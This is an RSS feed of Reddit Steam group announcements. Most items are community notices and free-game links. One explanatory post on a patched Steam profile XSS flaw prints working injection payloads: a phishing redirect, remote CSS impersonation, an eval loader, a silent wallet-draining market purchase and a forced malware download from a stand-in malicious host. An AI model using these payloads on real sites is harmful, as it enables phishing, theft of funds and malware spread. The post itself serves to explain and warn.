<?xml version="1.0" encoding="UTF-8"?>
<!-- Generated on Sun, 10 May 2026 14:04:30 -0700 -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <atom:link href="https://steamcommunity.com/groups/reddit" rel="self" type="application/rss+xml" />
    <title>Reddit RSS Feed</title>
    <link><![CDATA[https://steamcommunity.com/groups/reddit]]></link>
    <description><![CDATA[Events and Announcements for Reddit]]></description>
    <language>en-us</language>
    <generator>Steam Community RSS</generator>
    <item>
      <title>Recent Spam / Phishing Links</title>
      <description>Hello everybody, &lt;br&gt;&lt;br&gt;I am sure by now a lot of our members have seen the recent &amp;quot;Karambit&amp;quot; phishing links being pushed through the Reddit chat.&lt;br&gt;&lt;br&gt;I just want to remind everybody to not click any suspicious links, not just on the Reddit group, but everywhere in particular.&lt;br&gt;&lt;br&gt;The Admin team is working to maintain a clean chat, but given the abilities we have, set by Valve / Steam, it is difficult for us to actually put a stop to this.&lt;br&gt;&lt;br&gt;For now all we can hope is that they give us additional permissions to control these sorts of things, but until then, &lt;b&gt;DO NOT CLICKING ANY SUSPICIOUS LINKS&lt;/b&gt;&lt;br&gt;&lt;br&gt;Thank you.</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/2935745219115037534]]></link>
      <pubDate>Thu, 05 Nov 2020 20:25:38 +0000</pubDate>
      <author>Robot//Locke.</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/2935745219115037534</guid>
    </item>
    <item>
      <title>Comments Section Clean Up and New Rules</title>
      <description>Hello everyone,&lt;br&gt;&lt;br&gt;We've been looking at better managing the Steam group here. And one thing we're concerned about is the spam-like nature of the comments section. &lt;br&gt;&lt;br&gt;In order to address this we will be doing a few things:&lt;br&gt;&lt;br&gt;&lt;ul class=&quot;bb_ul&quot;&gt;    &lt;li&gt;A purge of all existing comments.&lt;br&gt;    &lt;/li&gt;&lt;li&gt;Implementing new rules for the comments section.&lt;/li&gt;&lt;/ul&gt;&lt;br&gt;The comments section has primarily been used for a &amp;quot;looking for friends&amp;quot; or &amp;quot;look at my artwork&amp;quot;. In order to clean up the comments section we will be creating new threads for this purpose. &lt;br&gt;&lt;br&gt;If you are looking for friends please post here:&lt;br&gt;&lt;br&gt;&lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/groups/reddit/discussions/0/1742216483309707144/&quot; target=&quot;_blank&quot; rel=&quot;&quot; &gt;https://steamcommunity.com/groups/reddit/discussions/0/1742216483309707144/&lt;/a&gt;&lt;br&gt;&lt;br&gt;If you have  some cool artwork you want to show off please post here&lt;br&gt;&lt;br&gt;&lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/groups/reddit/discussions/0/1742216483309727014/&quot; target=&quot;_blank&quot; rel=&quot;&quot; &gt;https://steamcommunity.com/groups/reddit/discussions/0/1742216483309727014/&lt;/a&gt;&lt;br&gt;&lt;br&gt;Note that in these new threads we will be implementing a strict set of rules that users must follow to post. Please ensure you read those in the thread before posting.&lt;br&gt;&lt;br&gt;Thanks!</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1697180487042233599]]></link>
      <pubDate>Wed, 01 Aug 2018 19:59:28 +0000</pubDate>
      <author>Satoru</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1697180487042233599</guid>
    </item>
    <item>
      <title>Represent the Reddit group during the Sale on the Saliens Minigame!</title>
      <description>The Saliens minigame allows people to work to enter giveaways for awesome games and to customize your own character. There are also free cards! Pick the Reddit group on your character's flag to represent the group!</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1683665881188303237]]></link>
      <pubDate>Thu, 21 Jun 2018 17:46:17 +0000</pubDate>
      <author>Axanery</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1683665881188303237</guid>
    </item>
    <item>
      <title>Happy New Year!</title>
      <description>Happy New Year for whenever it might be for you!&lt;br&gt;&lt;br&gt;- /r/Steam Moderators &amp;amp; Reddit Steam group admins.</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1577814808062430134]]></link>
      <pubDate>Sun, 31 Dec 2017 22:00:23 +0000</pubDate>
      <author>Creekie</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1577814808062430134</guid>
    </item>
    <item>
      <title>Sanctum 2 Free over at Humble Bundle</title>
      <description>Sanctum 2 is a great co-op tower defense game.&lt;br&gt;&lt;br&gt;Get it free &lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=https%3A%2F%2Fwww.humblebundle.com%2Fstore%2Fsanctum-2&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;HERE&lt;/a&gt;&lt;span class=&quot;bb_link_host&quot;&gt;[www.humblebundle.com]&lt;/span&gt;&lt;br&gt;&lt;br&gt;-Torm3nT</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1470851782089612241]]></link>
      <pubDate>Thu, 23 Nov 2017 18:38:57 +0000</pubDate>
      <author>-Torm3nT</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1470851782089612241</guid>
    </item>
    <item>
      <title>[expired] OUTLAST DELUXE EDITION is free from Humble Bundle for the next 23 hours</title>
      <description>&lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=https%3A%2F%2Fwww.humblebundle.com%2Fstore%2Foutlast-deluxe&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;Here&lt;/a&gt;&lt;span class=&quot;bb_link_host&quot;&gt;[www.humblebundle.com]&lt;/span&gt;&lt;br&gt;&lt;br&gt;Includes Outlast + Outlast Whistleblower.&lt;br&gt;&lt;br&gt;A Humble Bundle account is required.</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1477601466709501985]]></link>
      <pubDate>Fri, 22 Sep 2017 17:56:46 +0000</pubDate>
      <author>Toderico</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1477601466709501985</guid>
    </item>
    <item>
      <title>[expired] The Walking Dead season 1 is free from Humble Bundle for the next two days</title>
      <description>&lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=https%3A%2F%2Fwww.humblebundle.com%2Fstore%2Fthe-walking-dead-season-1&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt; Clicky	&lt;/a&gt;&lt;span class=&quot;bb_link_host&quot;&gt;[www.humblebundle.com]&lt;/span&gt;&lt;br&gt;&lt;br&gt;A Humble Bundle account is required.</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1455082296857063341]]></link>
      <pubDate>Thu, 07 Sep 2017 18:52:34 +0000</pubDate>
      <author>Shabazingzang</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1455082296857063341</guid>
    </item>
    <item>
      <title>Geek Con 2018 Hosted by Geekology Events - Kettering &amp; Cambridge *United Kingdom*</title>
      <description>Just a little Annoucement about a new Con to go and see, just get the word out, hopefully it will be a major player in years to come.&lt;br&gt;&lt;br&gt;Geek Con now is going for its 2nd year with Kettering &amp;amp; Cambridge with guest signings, stalls, gaming, competitions and more.&lt;br&gt;&lt;br&gt;Current Guest list includes:&lt;br&gt;Dante Basco - Hook&lt;br&gt;Mike Carter - Star Wars&lt;br&gt;Alycia Purrott - Power Rangers SPD&lt;br&gt;Chris Violette - Power Rangers SPD&lt;br&gt;Gareth David Lloyd - Torchwood&lt;br&gt;Erica Cerra - The 100&lt;br&gt;James Crossley - Gladiators&lt;br&gt;&lt;br&gt;and there may be more later on.&lt;br&gt;&lt;br&gt;&lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=https%3A%2F%2Fwww.facebook.com%2Fgeekologyevents%2F&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;Geekology Events Facebook Page&lt;/a&gt;&lt;span class=&quot;bb_link_host&quot;&gt;[www.facebook.com]&lt;/span&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;So go and support your local con we need more of them around.&lt;br&gt;&lt;br&gt;-Torm3nT</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/1455082200823769907]]></link>
      <pubDate>Wed, 06 Sep 2017 14:04:46 +0000</pubDate>
      <author>-Torm3nT</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/1455082200823769907</guid>
    </item>
    <item>
      <title>Hope You're all having a Great Summer!</title>
      <description>&lt;a class=&quot;bb_link&quot; href=&quot;https://youtu.be/UFatVn1hP3o&quot; target=&quot;_blank&quot; rel=&quot;&quot; &gt; Smile &lt;/a&gt;&lt;br&gt;&lt;br&gt;-Torm3nT</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/2072067834407582323]]></link>
      <pubDate>Tue, 20 Jun 2017 19:22:25 +0000</pubDate>
      <author>-Torm3nT</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/2072067834407582323</guid>
    </item>
    <item>
      <title>The Steam Community Exploit explained.</title>
      <description>As you're likely aware, yesterday an exploit spread rapidly through the Steam Community in the form of &amp;quot;How to get music on your profile&amp;quot;. This exploit was not necessarily a new discovery, but it was a dangerous one.&lt;br&gt;&lt;br&gt;This exploit had the potential to perform actions as you, or a number of any other creative malicious uses. For example, this exploit could be used to make market purchases without your knowledge, using your Steam funds, or it could silently redirect you to a phishing page without you doing anything but look at a Steam profile or your Activity Feed.&lt;br&gt;&lt;br&gt;I'd like to explain a bit better what this exploit is, and how it works.&lt;br&gt;&lt;br&gt;The Opening&lt;br&gt;&lt;br&gt;When you're developing a website that stores any information provided by the users, it goes into a database. Basic security demands that you NEVER trust the user's provided data, it should be filtered into a safe format before it ever hits the database, protecting from code injection, XSS (Cross-Site Scripting), and other nasties.&lt;br&gt;&lt;br&gt;What happened here is that Steam Guide titles were stored exactly as they were entered in, and then when you displayed these guides in your &amp;quot;My Showcase&amp;quot; on your profile, it would be included exactly as you wrote it originally, directly into the page's markup.&lt;br&gt;&lt;br&gt;The titles have a 128 character long limit, but you could also have 4 guides displayed at any time. Using this 128 character limit you could tell a browser to evaluate the text somewhere else as if it was JavaScript code and thus bypass this limit.&lt;br&gt;&lt;br&gt;Because the Steam website relies significantly on JavaScript it is almost a guarantee that any user browsing the profile has it enabled, thus it could be abused reliably.&lt;br&gt;&lt;br&gt;This exploit affected any browser that viewed the profile, including your Web Browser, your Steam Client, and your in-game Overlay.&lt;br&gt;&lt;br&gt;What is XSS? What's code injection?&lt;br&gt;&lt;br&gt;The simplest explanation for XSS, or Cross-Site Scripting, is that to be secure you should only allow scripting to be run from within your website, this way you know what is being run and where. XSS is the ability to run code in the website from outside of it, so for example running code on &lt;a class=&quot;bb_link&quot; href=&quot;http://steamcommunity.com&quot; target=&quot;_blank&quot; rel=&quot;&quot; &gt;steamcommunity.com&lt;/a&gt;, but the script actually exists at &lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.dodgywebsitescript.com%2Fbadscript.js&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;http://www.dodgywebsitescript.com/badscript.js&lt;/a&gt; Code injection is running malicious code within the website by using exploits to insert it directly into the page.&lt;br&gt;&lt;br&gt;How it was exploitable.&lt;br&gt;&lt;br&gt;Depending on what you wanted to achieve with the exploit, it could be a very simple process or a bit more in-depth. This is just a few examples, it could be easily abused to distribute malware or do any number of harmless to dangerously creative things.&lt;br&gt;&lt;br&gt;You needed to be Steam Level 10 to have access to the &amp;quot;My Guides&amp;quot; showcase.&lt;br&gt;&lt;br&gt;Redirecting a user to a website to phish their login.&lt;br&gt;&lt;br&gt;My first example was to demonstrate that it would be simple to redirect a user to a phishing website in order to gain their login credentials.&lt;br&gt;&lt;br&gt;1) Create a guide, use the title: &amp;lt;script&amp;gt;window.location = &amp;quot;[PHISHING_SITE_URL]&amp;quot;;&amp;lt;/script&amp;gt; This will redirect the user to [PHISHING_SITE_URL] when they view your profile. 2) Have a website ready with a fake login page, users will be redirected here. 3) When a user visits your profile, it will redirect to a login. Because they were viewing a legitimate Steam page they are extremely likely to not notice the phishing attemp and input their information.&lt;br&gt;&lt;br&gt;Utilizing CSS trickery to change your profile to trick users.&lt;br&gt;&lt;br&gt;Say you wanted to impersonate someone to steal items, or appear as if you're a Valve employee, or a Steam Moderator? You can do so relatively simply.&lt;br&gt;&lt;br&gt;1) Create a guide, use the title: &amp;lt;link rel=&amp;quot;text/stylesheet&amp;quot; href=&amp;quot;[YOUR_REMOTE_CSS_FILE]/&amp;gt;&amp;quot;&lt;br&gt;&lt;br&gt;This will load the CSS in the URL provided, and due to cascading rules it will generally overrule anything you are attempting to change. As an example, here is what I did (Harmlessly, bear in mind this could be used to change literally anything on the page) to my profile to demonstrate: &lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=https%3A%2F%2Fpuu.sh%2FtTvMX%2Fa1f6a9fbd4.png&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;https://puu.sh/tTvMX/a1f6a9fbd4.png&lt;/a&gt;&lt;br&gt;&lt;br&gt;Loading larger payloads&lt;br&gt;&lt;br&gt;Obviously the 128*4 character limit will be a problem for larger exploits, thus you can bypass this with some trickery and have enough room to do whatever you want.&lt;br&gt;&lt;br&gt;1) Create a guide with the following title: &amp;lt;script&amp;gt;$J(function(){eval($J(&amp;quot;.showcase_notes&amp;quot;).text());});&amp;lt;/script&amp;gt; This is telling the browser to get the text content of your &amp;quot;Custom Text&amp;quot; showcase, and evaluate it as if it's proper JavaScript. This showcase has a massive character limit, permitting free reign.&lt;br&gt;&lt;br&gt;Silently draining your Steam Wallet funds.&lt;br&gt;&lt;br&gt;Because you're already logged in, this exploit could be used to perform actions AS YOU. Steam Community Market purchases do not require Steam Guard verification, so you could maliciously drain any user's funds by having them visit your page. What this code does is create a silent buy order for as many of the Anarchist trading card as possible, this card is the highest quantity and cheapest. This card is $0.08, but has such a massive quantity it will buy as many as possible until your funds are depleted.&lt;br&gt;&lt;br&gt;1) Utilize the larger payload method above to have more room to write injected code. 2) In your custom info showcase use the following code: var g_Currency = 1; &lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=http%3A%2F%2F%24.post%28%27https%3A%2F%2Fsteamcommunity.com%2Fmarket%2Fcreatebuyorder%2F%27&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;$.post('https://steamcommunity.com/market/createbuyorder/'&lt;/a&gt;, {&amp;quot;sessionid&amp;quot;: g_SessionID, &amp;quot;currency&amp;quot;: g_Currency, &amp;quot;appid&amp;quot;: 753, &amp;quot;market_hash_name&amp;quot;: &amp;quot;730-Anarchist&amp;quot;, &amp;quot;price_total&amp;quot;: 9999, &amp;quot;quantity&amp;quot;: 99999}, function(json) {});&lt;br&gt;&lt;br&gt;Spreading Malware via an auto-download&lt;br&gt;&lt;br&gt;A simple vector for spreading malware would be to have some aptly named malware, like &amp;quot;SteamGuard-Desktop.msi&amp;quot; download using either HTML5's download attribute on a link, and click the link with javascript, or to handle it all in javascript like:&lt;br&gt;&lt;br&gt;$('&amp;lt;form&amp;gt;&amp;lt;/form&amp;gt;').attr('action', &lt;a class=&quot;bb_link&quot; href=&quot;https://steamcommunity.com/linkfilter/?u=http%3A%2F%2F%26quot%3Bmaliciouswebsite.com%2FSteamGuard-Desktop.msi%26quot%3B%29.appendTo%28%27body%27%29.submit%28%29.remove%28%29%3B&quot; target=&quot;_blank&quot; rel=&quot; noopener&quot; &gt;&amp;quot;maliciouswebsite.com/SteamGuard-Desktop.msi&amp;quot;).appendTo('body').submit().remove();&lt;/a&gt;&lt;br&gt;This will automatically download the linked file but still requires user action. One could easily have a Steam Guard dialog appear over the profile that explains this new Desktop version, enticing a user to open it. The user has never left the Steam website, thus they would heavily be inclined to open the malware.&lt;br&gt;&lt;br&gt;How this was fixed, and what should have been done to avoid it.&lt;br&gt;&lt;br&gt;Because the opening was guide titles, it was a very simple fix: Stop guide titles being inserted as-is from what the original user created. When creating HTML markup you use &amp;lt;&amp;gt; to denote what an element is, but if you want those symbols as just text then you change them to their HTML Entity values, so &amp;lt; becomes &amp;amp;lt; and &amp;gt; becomes &amp;amp;gt;, in PHP for example it's as simple as htmlencode($title);. If this was done from the start, the exploit wouldn't have existed. People make mistakes, and those at Valve are still people who are not infallible - This goes to show how such a relatively small overlook can have massive repercussions. NEVER TRUST USER-PROVIDED DATA&lt;br&gt;&lt;br&gt;Am I infected?&lt;br&gt;&lt;br&gt;In truth, it is incredibly unlikely with the window of it becoming popular being quite small before Valve patched it up. This doesn't mean it's impossible. If you've lost Steam Wallet funds unexpectedly, view your market transaction history and this will show any transactions that may have occurred using this exploit, and if you do find them contact Steam Support. If you're concerned you have been infected with malware via this exploit you should run scans with your Antivirus of choice and Malwarebytes, as well as changing your password via a different machine.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;a class=&quot;bb_link&quot; href=&quot;https://www.reddit.com/r/Steam/comments/5srlwd/the_steam_community_exploit_explained_indepth_by/&quot; target=&quot;_blank&quot; rel=&quot;&quot; &gt;https://www.reddit.com/r/Steam/comments/5srlwd/the_steam_community_exploit_explained_indepth_by/&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;-Torm3nT</description>
      <link><![CDATA[https://steamcommunity.com/groups/reddit/announcements/detail/675940444921357854]]></link>
      <pubDate>Wed, 08 Feb 2017 12:09:43 +0000</pubDate>
      <author>-Torm3nT</author>
      <guid isPermaLink="true">https://steamcommunity.com/groups/reddit/announcements/detail/675940444921357854</guid>
    </item>
  </channel>
</rss>